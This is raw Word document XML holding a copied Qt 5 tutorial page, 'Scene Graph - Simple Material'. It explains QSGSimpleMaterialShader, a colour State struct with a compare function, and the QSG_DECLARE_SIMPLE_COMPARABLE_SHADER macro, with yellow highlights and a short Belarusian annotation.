          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1814" w:name="_Toc483000923"/>
      <w:bookmarkStart w:id="1815" w:name="_Toc483003914"/>
      <w:bookmarkStart w:id="1816" w:name="_Toc483604266"/>
      <w:bookmarkStart w:id="1817" w:name="_Toc483605486"/>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scene Graph - Simple Material</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1814"/>
      <w:bookmarkEnd w:id="1815"/>
      <w:bookmarkEnd w:id="1816"/>
      <w:bookmarkEnd w:id="1817"/>
    </w:p>
    <w:p w:rsidR="00CD4012" w:rsidRPr="00CD4012" w:rsidRDefault="00CD4012" w:rsidP="00CD4012">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/simplematerial-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/simplematerial-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/simplematerial-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/simplematerial-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/simplematerial-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/simplematerial-example.jpg"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"http://doc.qt.io/qt-5/images/simplematerial-example.jpg"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"http://doc.qt.io/qt-5/images/simplematerial-example.jpg"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"http://doc.qt.io/qt-5/images/simplematerial-example.jpg"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"http://doc.qt.io/qt-5/images/simplematerial-example.jpg"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"http://doc.qt.io/qt-5/images/simplematerial-example.jpg"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"http://doc.qt.io/qt-5/images/simplematerial-example.jpg"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"http://doc.qt.io/qt-5/images/simplematerial-example.jpg"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"http://doc.qt.io/qt-5/images/simplematerial-example.jpg"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"http://doc.qt.io/qt-5/images/simplematerial-example.jpg"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"http://doc.qt.io/qt-5/images/simplematerial-example.jpg"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"http://doc.qt.io/qt-5/images/simplematerial-example.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1052" type="#_x0000_t75" alt="" style="width:237.9pt;height:5in">
            <v:imagedata r:id="rId2143" r:href="rId2144"/>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00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>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 xml:space="preserve">In this example, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we will make use of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2145" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGSimpleMaterialShader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class to fill a shape in the scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convenience class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> intended to avoid a lot of the boilerplate code required </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> creating materials with the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2146" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGMaterial</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2147" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGMaterialShader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2148" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGMaterialType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>classes directly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4012" w:rsidRPr="00CD4012" w:rsidRDefault="00CD4012" w:rsidP="00CD4012">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simple material consists of two parts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>material state</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>material shader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The material </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shader has one instance per scene graph and contains the actual OpenGL shader program and information about which attributes and uniforms it uses</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>material state is what we assign to each individual node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; in this case to give them different colors.</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struct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State</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QColor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> color</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> compare</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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State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other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const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uint</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rgb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rgba</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uint</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> otherRgb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other</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rgba</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if</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rgb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otherRgb</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</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0</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else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if</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rgb </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> otherRgb</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return</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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else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return</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1</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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>first thing we do when creating custom materials with the simplified scheme</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create a state class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In this case the state class contains only one member, a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2149" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QColor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It also defines a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>compare function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scene graph can use to reorder the node rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>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class</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Shader</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public</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QSGSimpleMaterialShader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    QSG_DECLARE_SIMPLE_COMPARABLE_SHADER</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Shader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State</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 xml:space="preserve">Next we </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>define the material shader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, by subclassing a template instantiation of</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2150" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGSimpleMaterialShader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with our</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>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Then we use the macro</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2151" w:anchor="QSG_DECLARE_SIMPLE_COMPARABLE_SHADER" w:history="1">
        <w:r w:rsidRPr="00BA5376">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSG_DECLARE_SIMPLE_COMPARABLE_SHADER</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>generate some boilerplate code for us</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E2225C">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00BA5376" w:rsidRPr="00BA5376">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Прызначэнне макрасаў</w:t>
      </w:r>
      <w:r w:rsidR="00E2225C">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Since our</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
